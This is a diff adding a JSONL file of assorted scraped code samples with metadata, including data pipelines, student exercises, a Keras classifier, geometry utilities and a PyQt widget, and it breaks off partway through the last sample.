diff --git "a/232.jsonl" "b/232.jsonl" new file mode 100644--- /dev/null +++ "b/232.jsonl" @@ -0,0 +1,675 @@ +{"seq_id":"611271314","text":"# -*- coding: UTF-8 -*-\n#简单的求取分帧后假设对应的plc同样分帧,求取主轴负载的均值,最终会输出一个数据集主轴负载的所有分帧平均值和标准差\n\nimport pandas as pd\nimport os\n\ndef filesplit(pathname,filename,targetfile):\n #pathname--sensor文件夹绝对路径 filename--对应的plc文件绝对路径 targetfile--目标文件绝对路径\n df = pd.read_csv(filename)\n filelist = os.listdir(pathname)\n filelist.sort(key= lambda x:int(x[:-4]))\n spinload_list = []\n for somefile in filelist:\n filepath = os.path.join(pathname,somefile)\n dk = pd.read_csv(filepath)\n length_window = 12800 #train01 train02 12800 train03 9600 这里处理与sensor分帧相同\n count_window = int(dk.shape[0]/length_window)\n dh = df[df.csv_no==int(somefile.split('.')[0])].reset_index(drop=True)\n baseline = dh.shape[0]//count_window\n print(count_window)\n for i in range(0,count_window): \n dl = dh.iloc[i*baseline:(i+1)*baseline,:]\n spindle_mean = dl['spindle_load'].mean()\n spindle_std = dl['spindle_load'].std()\n spinload_list.append([spindle_mean,spindle_std])\n result_list = pd.DataFrame(spinload_list)\n result_list.to_csv(targetfile,index=None,header=None)\n\n#filesplit('/data/01/sensor','/data/01/plc.csv','/feature/plc01.csv')\n#filesplit('/data/02/sensor','/data/02/plc.csv','/feature/plc02.csv')\n#filesplit('/data/03/sensor','/data/03/plc.csv','/feature/plc03.csv')\n\n\n\n\n \n\n","sub_path":"Tool_RUL_Prediction/code/plc_divide.py","file_name":"plc_divide.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"629574141","text":"print(\"\\n===== NO 1 =======\")\n\nlist_anka=[]\nfor i in range(1,101):\n if(i %3 == 0):\n list_anka.append(i)\n\nfor i in range(len(list_anka)):\n print(list_anka[i],end=\" \")\n\n\n\n\n\n\n\nprint(\"\\n===== NO 2 =======\")\n#no 2\nbil=[]\nk = 0\nwhile(True):\n n = int(input(\"Input Data : \"))\n bil.append(n)\n cek = input(\"Input Lagi(y/n) : \")\n if(cek == 'y'):\n k+=1\n else:\n break\n\nfor i in range(len(bil)):\n print(bil[i], end=\", \")\n\nprint(\"\\n===== NO 3 =======\")\n#no 3\n\nipk=[]\nfor i in range(10):\n in_ip = float(input(\"Input ipk : \"))\n ipk.append(in_ip)\n\njml = 0; rata_rata = 0\nmaximum = ipk[0]; minimum = ipk[0]\nfor i in range(len(ipk)):\n print(ipk[i], end=\" \")\n jml = jml + ipk[i]\n\n if minimum > ipk[i]:\n minimum = ipk[i]\n \n if maximum < ipk[i]:\n maximum = ipk[i]\n\nprint(\"\\nmax = \",maximum,\"min = \",minimum,\"rata-rata = \",jml/len(ipk))","sub_path":"daspro_9/latihanlist.py","file_name":"latihanlist.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"652955328","text":"import sys\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\ndef load(message_filepath, categories_filepath):\n \"\"\"\n Arguments:\n messages_filepath: path to messages csv\n categories_filepath: path to categories csv\n Output:\n df: loaded data as pandas Dataframe merged on key 'id'\n \"\"\"\n messages = pd.read_csv(message_filepath)\n categories = pd.read_csv(categories_filepath)\n return pd.merge(messages, categories, on='id')\n\ndef clean_data(df):\n \"\"\"\n Arguments:\n df: raw data pandas Dataframe\n Outputs:\n df: cleaned pandas dataframe\n \"\"\"\n # split categories into seperate columns by ';'\n categories = df['categories'].str.split(';', expand=True)\n # select first row\n row = categories.iloc[0,:]\n # extract list of new column names\n 
category_columns = row.apply(lambda s : str(s)[:-2])\n # assign new columns names\n categories.columns = category_columns\n for column in categories:\n # set each value to be the last character of the string\n # convert column to numeric\n categories[column] = categories[column].apply(lambda s : int(str(s)[-1]))\n # drop the original categroies column from 'df'\n df.drop(labels=['categories'], axis=1, inplace=True)\n df = pd.concat([df, categories], axis=1, join='inner')\n df.drop_duplicates(inplace=True)\n return df\n\ndef save_data(df, save_file):\n \"\"\"\n Arguments:\n df: cleaned data in pandas df\n save_file: destination filepath\n \"\"\"\n engine = create_engine('sqlite:///'+ save_file)\n df.to_sql('DisasterResponse', engine, index=False, if_exists='replace')\n pass\n\ndef main():\n \"\"\"\n ETL PIPELINE\n 1. extract data (from .csv)\n 2. clean and pre-process data\n 3. Load data into SQLite database\n \"\"\"\n if len(sys.argv) == 4:\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'.format(messages_filepath, categories_filepath))\n df = load(messages_filepath, categories_filepath)\n print('Cleaning data...')\n df = clean_data(df)\n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\n save_data(df, database_filepath)\n print('Cleaned data saved to database!')\n else:\n print('Please provide the filepaths of the messages and categories '\\\n 'datasets as the first and second argument respectively, as '\\\n 'well as the filepath of the database to save the cleaned data '\\\n 'to as the third argument. \\n\\nExample: python process_data.py '\\\n 'disaster_messages.csv disaster_categories.csv '\\\n 'DisasterResponse.db')\n\nif __name__ == '__main__':\n main()\n","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"473777334","text":"#!/usr/bin/python3\n\nimport os\nimport argparse\nfrom pprint import pprint\n\nimport clang.check\nimport clang.tidy\nimport clang.format\n\n\ndef main(project_dir, silent=False):\n files = ['world_type.h', 'simulation.cpp', 'p3.cpp', 'simulation.h']\n format_dir = os.path.join(project_dir, 'formatted')\n\n clang.format.generate_formatted_files(project_dir, format_dir, files, silent=silent)\n\n clang_check_score = 0\n\n functions = clang.check.parse_functions_new(format_dir, files, silent=silent)\n clang.check.parse_comments(functions, silent=silent)\n\n subroutine_count = 0\n long_function_count = 0\n\n for func_prototype, func in functions.items():\n if func.name != 'main' and func.len >= 1:\n subroutine_count += 1\n if func.len >= 120:\n long_function_count += 1\n\n clang_check_score += min(3, subroutine_count // 5)\n clang_check_score += max(0, 3 - long_function_count)\n\n if not silent:\n print('\\nsubroutines: %d, long functions: %d' % (subroutine_count, long_function_count))\n print('clang-check score: %d' % clang_check_score)\n\n clang_tidy_warnings, clang_tidy_warnings_count = clang.tidy.parse_warnings_new(project_dir, files, silent=silent)\n clang_tidy_score = 0\n\n if clang_tidy_warnings_count <= 10:\n clang_tidy_score += 2\n elif clang_tidy_warnings_count <= 25:\n clang_tidy_score += 1\n if len(clang_tidy_warnings) <= 3:\n clang_tidy_score += 2\n elif len(clang_tidy_warnings) <= 6:\n clang_tidy_score += 1\n if not silent:\n pprint(clang_tidy_warnings)\n print('\\nclang-tidy score: %d' % 
clang_tidy_score)\n\n if silent:\n print('%d,%d' % (clang_check_score, clang_tidy_score))\n\n\nparser = argparse.ArgumentParser(description='Project 3 Code Checker.')\nparser.add_argument('--silent', action='store_true')\nparser.add_argument('project_dir', type=str, nargs=1)\nargs = parser.parse_args()\nmain(args.project_dir[0], silent=args.silent)\n","sub_path":"p3/codestyle.py","file_name":"codestyle.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"131715186","text":"import json\n\nfrom torch.multiprocessing import ProcessExitedException\n\nfrom projectcode.training import pickled_train_and_evaluate\nfrom loguru import logger\nimport time\nimport main_config\nimport requests\nfrom projectcode.server.database import (\n get_task,\n pickle_load_from_str,\n get_incomplete_task,\n Task,\n pickle_to_str,\n get_own_inprogress_task,\n connect,\n get_inprogress_task,\n)\nfrom projectcode.datasets.cifar10 import CifarDataset\nimport datetime\nfrom google.api_core.exceptions import ServiceUnavailable\n\n\nclass Client:\n def __init__(self, client_id: str, client_stream: str = \"tpu\"):\n self.headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9\"\n }\n self.client_id = client_id\n self.ds = None\n if \"GPU\" in client_id:\n self.client_stream = \"gpu\"\n else:\n self.client_stream = client_stream\n\n if self.client_stream == 'tpu':\n import torch_xla\n\n def do_task(self, task: Task):\n\n spec = pickle_load_from_str(task.pkl_data)\n\n return pickled_train_and_evaluate(spec=spec, client_id=self.client_id)\n\n def report_task(self, task: Task, results: dict = None, success: bool = True):\n connect()\n\n if get_task(key = task.key) is None:\n logger.warning(\"Task completed or failed, but not longer exists on the server\")\n else:\n if success:\n if task.state == \"complete\":\n logger.warning(\"Task already completed by another\")\n else:\n\n\n task.state = \"complete\"\n task.result_pkl_data = pickle_to_str(obj=results)\n task.save()\n else:\n if task.extra_workers != 0:\n logger.info(\n \"There are other workers on this task. 
Attempting to restart the same task.\"\n )\n logger.info(\"Successfully Reported Failure of Task\")\n\n else:\n task.state = \"incomplete\"\n task.save()\n logger.info(\"Successfully Reported Failure of Task\")\n\n return\n\n def get_task(self) -> Task:\n connect()\n\n task = get_own_inprogress_task(self.client_id, client_stream=self.client_stream)\n if task is None:\n\n task = get_incomplete_task(client_stream=self.client_stream)\n if task is None:\n # here, we get a task that's already being worked on so that if the first worker fails, the second worker\n # has already started working on the task and has made progress\n logger.info(\"Trying to Double Up\")\n task = get_inprogress_task(client_stream=self.client_stream)\n if task is not None:\n task.extra_workers = 1\n task.save()\n logger.info(\"Doubling up on a task\")\n\n else:\n logger.info(\"Resuming own incomplete task\")\n\n if task is not None:\n\n task.state = \"inprogress\"\n task.assigned_to = self.client_id\n task.assigned_at = datetime.datetime.now()\n\n logger.info(task)\n\n task.save()\n\n return task\n\n def prepare(self):\n self.ds = CifarDataset()\n\n def run(self):\n\n self.prepare()\n\n logger.info(\"Beginning training loop\")\n\n while True:\n logger.info(\"Getting Task\")\n\n task = self.get_task()\n\n if task is None:\n logger.info(\n \"No Task Found. Retrying in %i seconds\"\n % main_config.client.wait_time\n )\n time.sleep(main_config.client.wait_time)\n else:\n\n # TODO: convert to context manager to guarantee reporting of task failure\n\n sucess = False\n\n try:\n results = self.do_task(task)\n logger.info(\"Completed Execution of Task\")\n self.report_task(task, results)\n logger.info(\"Reported Task Completion\")\n sucess = True\n\n except Exception as e:\n\n if type(e) == ProcessExitedException:\n logger.warning(\"Task failed due to Torch Multiprocessing\")\n else:\n logger.warning(\"Task failed\")\n\n self.report_task(task, success=False)\n\n logger.exception(\"Logging Exception\")\n\n if type(e) == ProcessExitedException:\n pass\n elif type(e) == ServiceUnavailable:\n pass\n else:\n raise\n\n finally:\n\n if not sucess:\n logger.warning(\"Task failed\")\n self.report_task(task, success=False)\n","sub_path":"projectcode/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476622887","text":"# __author__ = ‘penny‘\n# -*-coding:utf-8-*-\n\nimport unittest,time,HTMLTestRunner\nfrom config import globalparam\n\ncase_dir = globalparam.prj_path + './src/test/case/'\ndiscover = unittest.defaultTestLoader.discover(case_dir,pattern='start_login.py',top_level_dir=None)\n\n\nif __name__ == '__main__':\n now = time.strftime(\"%Y-%m-%d %H_%M_%S\")\n filename = globalparam.prj_path + './report/testreport/' + now + 'tesult.html'\n fp = open(filename, 'wb')\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp,\n title=u'启通宝登录测试报告',\n description=u'环境:window7 浏览器:firefox')\n runner.run(discover)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"86547517","text":"import math\r\n\r\nclass contribution_calculator_contest:\r\n score = []\r\n normalized_score = []\r\n contribution_score = []\r\n points_per_question = 0.2\r\n mean = 0\r\n standard_deviation = 0\r\n no_of_participants = 0\r\n\r\n codeforces = 0.25\r\n codechef = 0.15\r\n hackerearth = 0.2\r\n\r\n 
def __init__(self, score=[], value_per_question = 0.25, site=\"\"):\r\n self.score = list(score)\r\n self.no_of_participants = len(score)\r\n self.points_per_question = value_per_question\r\n\r\n if(site == \"codeforces\"):\r\n self.points_per_question = self.codeforces\r\n if(site == \"hackerearth\"):\r\n self.points_per_question = self.hackerearth\r\n if(site == \"codechef\"):\r\n self.points_per_question = self.codechef\r\n\r\n def get_mean(self):\r\n total_score = 0\r\n for individual_score in self.score:\r\n total_score += individual_score\r\n self.mean = total_score/self.no_of_participants\r\n\r\n def get_standard_deviation(self):\r\n total_score_squared = 0\r\n for individual_score in self.score:\r\n total_score_squared = total_score_squared + individual_score**2\r\n variance = total_score_squared/self.no_of_participants - self.no_of_participants*(self.mean**2)\r\n self.standard_deviation = math.sqrt(variance)\r\n\r\n def get_normalized_score(self):\r\n self.get_mean()\r\n self.get_standard_deviation()\r\n\r\n if(self.standard_deviation < 0.75):\r\n self.standard_deviation = 0.75\r\n\r\n self.normalized_score = list(self.score);\r\n for participant in range(self.no_of_participants):\r\n self.normalized_score[participant] = (self.score[participant] - self.mean)/self.standard_deviation\r\n \r\n def get_contribution_score(self):\r\n if(self.no_of_participants == 0):\r\n return []\r\n\r\n self.get_normalized_score()\r\n standardised_score = list(self.normalized_score)\r\n minimum = 0.33 - min(standardised_score)\r\n for participant in range(self.no_of_participants):\r\n standardised_score[participant] = (standardised_score[participant] + minimum)*0.75\r\n \r\n contribution_score = standardised_score\r\n for participant in range(self.no_of_participants):\r\n contribution_score[participant] = standardised_score[participant] + self.points_per_question * self.score[participant]\r\n \r\n return contribution_score\r\n\r\n","sub_path":"contribution_calculator_contest.py","file_name":"contribution_calculator_contest.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"346741353","text":"import ownrandom\nimport matplotlib.pyplot as plt\nimport math\nfrom random import randint\n\ndef euler(r, T, Ts, part=1):\n return -r*(T-Ts)/part\n\ndef tabulator(T, Ts, r, part):\n counter = 0\n x = [counter]\n y = [T]\n while round(T,3) > Ts:\n counter += 1\n t = euler(r, T, Ts, part)\n T += t\n x.append(counter)\n y.append(T)\n return x, y\n\n\ndef time_tabulator(T, Ts, r, minutes):\n x = []\n y = []\n x.append(0)\n y.append(T)\n for i in range(1, minutes):\n t = round(euler(r, T, Ts),2)\n T += t\n x.append(i)\n y.append(T)\n return x, y\n\n\ndef delta(y, y_pidbir):\n delta = 0\n for i in range(0, len(y)):\n delta += (y[i]-y_pidbir[i])**2\n delta = math.sqrt(delta)\n return delta\n\nT = 85\nTs = 20\nr = 0.12\nx_pidbir = list(i for i in range(0, 15))\ny_pidbir = [77.7, 75.1, 73, 71.1, 69.4, 67.8, 66.4, 64.7, 63.4, 62.1, 61, 59.9, 58.7, 57.8, 56.6]\n\n\nprint(\"Завдання 1\")\nx_1, y_1 = tabulator(T, Ts, r, 1)\nplt.plot(x_1, y_1)\nplt.show()\nprint(\"Завдання 2\")\nx_2, y_2 = tabulator(T, Ts, r, 2)\nplt.plot(x_2, y_2)\nplt.show()\nprint(\"Завдання 3\")\nr = 0.033333\nx_3, y_3 = time_tabulator(77.7, 20, r, 15)\n\nplt.plot(x_3, y_3)\nplt.plot(x_pidbir, y_pidbir, \"ro\")\nplt.show()\n","sub_path":"2 
курс/Modelling/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"633967465","text":"import read\nimport collections\n\ndf = read.load_data()\nstr_h_df=''\nfor h in df['headline']:\n h = str(h)\n h1=h.lower()\n str_h_df=str_h_df + ' ' + h1\n#print(str_h_df)\n#print(collections.Counter(str_h_df).most_common(3))\nwords = str_h_df.split(\" \")\nc= collections.Counter(words)\nresult = c.most_common(100)\nprint(result)","sub_path":"count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"61837046","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 27 13:58:01 2018\n\n@author: Benson\n\"\"\"\n\n\n# error example\namount = 10000 # 總消費金額\nnumOfPeople = input(\"請輸入人數:\") # input() 永遠返回字串 string\nnumOfPeople = int(numOfPeople) # 將 string 轉成 integer\n\nprint( \"每人須付 $\" + str(amount / numOfPeople) )\nprint( \"繼續運行程式\" )\n\n\n\n\n# using if to avoid error\namount = 10000 # 總金額 10000\nnumOfPeople = int( input(\"請輸入人數:\") ) # 如果用戶輸入非數字字母,程式到這句還是會出錯!\nif numOfPeople > 0:\n print( \"每人須付 $\" + str(amount / numOfPeople) )\nelse:\n print( \"人數必須為整數,且大於零!\" )\n \nprint( \"繼續運行程式\" ) \n\n\n\n\n\n# try-except method\ntry:\n amount = 10000\n numOfPeople = int( input(\"請輸入人數:\") )\n amountPerPerson = amount / numOfPeople\n print( \"每人須付 $\" + str(amountPerPerson) )\nexcept:\n print( \"人數必須為整數,且大於零!\" )\n\nprint( \"繼續運行程式\" )\n\n\n\n\n# get error message\ntry:\n 1/0\nexcept Exception as e: # 取得錯誤碼,儲存到變數 e\n print( \"發生了錯誤:\" + str(e) ) # 輸出錯誤碼\n\n\n\n# nested try-except\ntry:\n try:\n 1/0\n except:\n print(\"Caught by inner\")\n\n print(\"Continue\")\nexcept:\n print(\"Caught by outer\")\n\n\n\n\n# exercise\n\n\n\n\n\n","sub_path":"b教材-程式檔案/03 Python 語法3/1.13 try-except.py","file_name":"1.13 try-except.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"312726421","text":"import json\nimport numpy as np\nimport math\nimport argparse\nimport torch\nimport ConcaveHull as ch\nfrom torch.utils.data import DataLoader\nimport edge_imageprovider as image_provider\nfrom functools import reduce\nimport operator\nimport torch.nn as nn\nimport sklearn.metrics as sm\nimport cv2\nimport torch.nn.functional as F\nfrom skimage.io import imsave\n\n\n\ndef compute_iou_and_accuracy(arrs, edge_mask1):\n intersection = cv2.bitwise_and(arrs, edge_mask1)\n union = cv2.bitwise_or(arrs, edge_mask1)\n\n intersection_sum = np.sum(intersection)\n union_sum = np.sum(union)\n\n iou = intersection_sum / union_sum\n\n total = np.sum(arrs)\n correct_predictions = intersection_sum\n\n accuracy = correct_predictions / total\n # print(iou, accuracy)\n\n return iou, accuracy\n\n\n\n return train_loader\n\ndef sort_clockwise(poly):\n coords = poly[:]\n center = tuple(map(operator.truediv, reduce(lambda x, y: map(operator.add, x, y), coords), [len(coords)] * 2))\n coords = sorted(coords, key=lambda coord: (-225 - math.degrees(\n math.atan2(*tuple(map(operator.sub, coord, center))[::-1]))) % 360)\n\n return coords\n\n\n\ndef uniformsample(pgtnp_px2, newpnum):\n pnum, cnum = pgtnp_px2.shape\n assert cnum == 2\n\n idxnext_p = (np.arange(pnum, dtype=np.int32) + 1) % pnum\n pgtnext_px2 = pgtnp_px2[idxnext_p]\n edgelen_p = np.sqrt(np.sum((pgtnext_px2 - pgtnp_px2) ** 2, axis=1))\n 
edgeidxsort_p = np.argsort(edgelen_p)\n\n # two cases\n # we need to remove gt points\n # we simply remove shortest paths\n if pnum > newpnum:\n edgeidxkeep_k = edgeidxsort_p[pnum - newpnum:]\n edgeidxsort_k = np.sort(edgeidxkeep_k)\n pgtnp_kx2 = pgtnp_px2[edgeidxsort_k]\n assert pgtnp_kx2.shape[0] == newpnum\n return pgtnp_kx2\n # we need to add gt points\n # we simply add it uniformly\n else:\n edgenum = np.round(edgelen_p * newpnum / np.sum(edgelen_p)).astype(np.int32)\n for i in range(pnum):\n if edgenum[i] == 0:\n edgenum[i] = 1\n\n # after round, it may has 1 or 2 mismatch\n edgenumsum = np.sum(edgenum)\n if edgenumsum != newpnum:\n\n if edgenumsum > newpnum:\n\n id = -1\n passnum = edgenumsum - newpnum\n while passnum > 0:\n edgeid = edgeidxsort_p[id]\n if edgenum[edgeid] > passnum:\n edgenum[edgeid] -= passnum\n passnum -= passnum\n else:\n passnum -= edgenum[edgeid] - 1\n edgenum[edgeid] -= edgenum[edgeid] - 1\n id -= 1\n else:\n id = -1\n edgeid = edgeidxsort_p[id]\n edgenum[edgeid] += newpnum - edgenumsum\n\n assert np.sum(edgenum) == newpnum\n\n psample = []\n for i in range(pnum):\n pb_1x2 = pgtnp_px2[i:i + 1]\n pe_1x2 = pgtnext_px2[i:i + 1]\n\n pnewnum = edgenum[i]\n wnp_kx1 = np.arange(edgenum[i], dtype=np.float32).reshape(-1, 1) / edgenum[i];\n\n pmids = pb_1x2 * (1 - wnp_kx1) + pe_1x2 * wnp_kx1\n psample.append(pmids)\n\n psamplenp = np.concatenate(psample, axis=0)\n return psamplenp\n\n\ndef get_hull(edge_logits):\n test = edge_logits\n test_0 = test[:, :]\n test_1 = test[:, :]\n\n points_pred = []\n\n for i in range(len(test_1)):\n for j in range(len(test_1[0])):\n if test_1[i][j] > 0:\n points_pred.append([i, j])\n\n points_pred = np.asarray(points_pred)\n\n hull = ch.concaveHull(points_pred, 3)\n # print(hull)\n return hull\n\n\ndef convert_hull_to_cv(hull, w, h):\n\n original_hull = []\n for i in hull:\n original_hull.append([i[1], i[0]])\n return original_hull\n\ndef clockwise_check(points):\n sum = 0\n for i in range(len(points)):\n if i != len(points) - 1:\n sum_x = points[i+1][0] - points[i][0]\n sum_y = points[i+1][1] + points[i][1]\n sum += sum_x * sum_y\n else:\n sum_x = points[0][0] - points[i][0]\n sum_y = points[0][1] + points[i][1]\n sum += sum_x * sum_y\n if sum > 0:\n return True\n else:\n return False\n\n\n\n\n\ncomplete_data = []\ncomplete_data1 = []\nptk = 0\nd_iou1 = dict()\nd_iou_c1 = dict()\nd_accuracy1 = dict()\nd_accuracy_c1 = dict()\n\npred_cm = []\ngt_cm = []\n\n\ndef testing_hull(poly_logits,class_prob, bbox):\n \n vertex_logits = poly_logits\n # edge_logits = torch.sigmoid(edge_logits)\n # edge_logits = edge_logits[0,0,:,:]\n class_prob = F.log_softmax(class_prob)\n class_prob = torch.squeeze(class_prob)\n # print(class_prob)\n class_label, index = torch.topk(class_prob, 1)\n classes = ['Hole(Physical)','Character Line Segment', 'Character Component','Picture','Decorator','Library Marker', 'Boundary Line', 'Physical Degradation']\n \n\n poly_logits = torch.sigmoid(poly_logits)\n poly_logits = poly_logits[0,0,:,:]\n\n arrs2 = np.zeros((30, 60), np.uint8)\n for j in range(len(poly_logits)):\n for k in range((len(poly_logits[j]))):\n j1 = math.floor(j)\n k1 = math.floor(k)\n if poly_logits[j][k]>0.51:\n arrs2[j1][k1]= 255\n\n\n kernel7 = np.ones((2,2),np.uint8)\n kernel2 = np.ones((3,3),np.uint8)\n # kernel1 = np.ones((2,2),np.uint8)\n # arrs2 = cv2.morphologyEx(arrs2, cv2.MORPH_OPEN, kernel2)\n arrs2 = cv2.morphologyEx(arrs2, cv2.MORPH_CLOSE, kernel2)\n # arrs2 = cv2.morphologyEx(arrs2, cv2.MORPH_CLOSE, kernel7)\n\n kernel2 = 
np.ones((3,3),np.uint8)\n\n borders55 = np.zeros((30, 60), np.float32)\n\n im, contours, hierarchy = cv2.findContours(arrs2,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n max_area=0\n largest_contour=-1\n for i in range(len(contours)):\n cont=contours[i]\n area=cv2.contourArea(cont)\n if(area>max_area):\n max_area=area\n largest_contour=i\n\n h_contour=contours[largest_contour]\n cv2.polylines(borders55, np.int32([h_contour]),True,[1], thickness = 1)\n \n\n arrs1 = torch.from_numpy(borders55)\n hull = get_hull(arrs1)\n\n hull = np.asarray(hull)\n hull = hull.tolist()\n\n w = bbox[0][2]\n h = bbox[0][3]\n\n original_hull = convert_hull_to_cv(hull, w, h)\n # original_hull14 = convert_hull_to_cv(hull14, w, h)\n\n total_points = 100\n original_hull = sort_clockwise(original_hull)\n original_hull = uniformsample(np.asarray(original_hull), total_points).astype(int).tolist()\n \n\n if clockwise_check(original_hull) == False:\n original_hull = original_hull[::-1]\n\n if clockwise_check(original_hull) == False:\n print(\"mismatch!!!!!!!!!!\")\n return original_hull","sub_path":"configs/baselines/DACN/test_hull.py","file_name":"test_hull.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476186423","text":"items = input().split(\", \")\r\ncommand = input()\r\n\r\nwhile command != \"Craft!\":\r\n action, item = command.split(\" - \")\r\n\r\n if action == \"Collect\":\r\n if item not in items:\r\n items.append(item)\r\n\r\n elif action == \"Drop\":\r\n if item in items:\r\n items.remove(item)\r\n\r\n elif action == \"Combine Items\":\r\n old, new = item.split(\":\")\r\n if old in items:\r\n x = items.index(old)\r\n items.insert(x+1, new)\r\n else:\r\n continue\r\n\r\n elif action == \"Renew\":\r\n if item in items:\r\n x = items.index(item)\r\n y = items.pop(x)\r\n items.append(item)\r\n command = input()\r\nprint(\", \".join(items))","sub_path":"05. Lists Advanced Exercises/10. Inventory.py","file_name":"10. 
Inventory.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"190384398","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 7 10:48:26 2018\r\n\r\n@author: dragz17\r\n\"\"\"\r\n\r\n# Importing the Keras libraries and packages\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dropout\r\n\r\n#dummy_y = ['anjing', 'kucing']\r\n\r\n#def baseline_model():\r\n# create model\r\nmodel = Sequential()\r\nmodel.add(Flatten(input_shape=(32,32,3)))\r\nmodel.add(Dense(200, input_dim=3072, activation='relu'))\r\nmodel.add(Dropout(0.9))\r\nmodel.add(Dense(200, activation='relu'))\r\nmodel.add(Dropout(0.9))\r\nmodel.add(Dense(200, activation='relu'))\r\nmodel.add(Dropout(0.9))\r\nmodel.add(Dense(1, activation='sigmoid'))\r\n# Compile model\r\nmodel.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\r\n\r\n\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\ntrain_datagen = ImageDataGenerator(rescale = 1./255, \r\n shear_range = 0.2, \r\n zoom_range = 0.2, \r\n horizontal_flip = True)\r\n\r\ntest_datagen = ImageDataGenerator(rescale = 1./255)\r\n\r\ntraining_set = train_datagen.flow_from_directory('./train', \r\n target_size = (32, 32), batch_size = 32, class_mode = 'binary')\r\ntest_set = test_datagen.flow_from_directory('./test1', target_size = (32, 32), batch_size = 32, class_mode = 'binary')\r\n\r\n\r\n\r\nmodel.fit_generator(training_set, steps_per_epoch = 24999, epochs = 100, validation_data = test_set, validation_steps = 12500)\r\n\r\n\r\n#estimator = KerasClassifier(build_fn=baseline_model, epochs=200, batch_size=5, verbose=0)\r\n\r\n#kfold = KFold(n_splits=10, shuffle=True, random_state=None)\r\n#results = cross_val_score(estimator, X, dummy_y, cv=kfold)\r\n#print(\"Accuracy: %.2f%% (%.2f%%)\" % (results.mean()*100, results.std()*100))\r\n \r\n\r\n","sub_path":"deep learning-python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"592108787","text":"# Based largely on the logic of this Stackoverflow answer:\n# http://stackoverflow.com/a/16996439\n\nnumber = int(input(\"Number to factorise: \"))\n\ndividend = number\ndivisor = 2\n\nwhile divisor * divisor <= dividend:\n\twhile dividend % divisor == 0:\n\t\tdividend //= divisor\n\tdivisor += 1\n\nprint(dividend)","sub_path":"factoriser.py","file_name":"factoriser.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"392189769","text":"from PyQt5.QtWidgets import QWidget, QLineEdit, QDialogButtonBox, QLabel, QPushButton, QGridLayout, QCheckBox\nfrom PyQt5.QtCore import pyqtSignal\n\n\nclass Printwidget(QWidget):\n sendCommand = pyqtSignal(str)\n\n def __init__(self, parent=None):\n super(Printwidget, self).__init__(parent)\n self.atr_btn_us = QPushButton(text=\"US\", objectName=\"atr_us\")\n self.data_btn_us = QPushButton(text=\"US\", objectName=\"atr_us\")\n self.data_to_print = QLineEdit(self)\n self.attributes_field = QLineEdit(self)\n self.buttonBox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\n self.buttonBox.accepted.connect(self.accept)\n self.buttonBox.rejected.connect(lambda: self.close())\n self.W = QCheckBox(text=\"Szerokość\")\n self.H = 
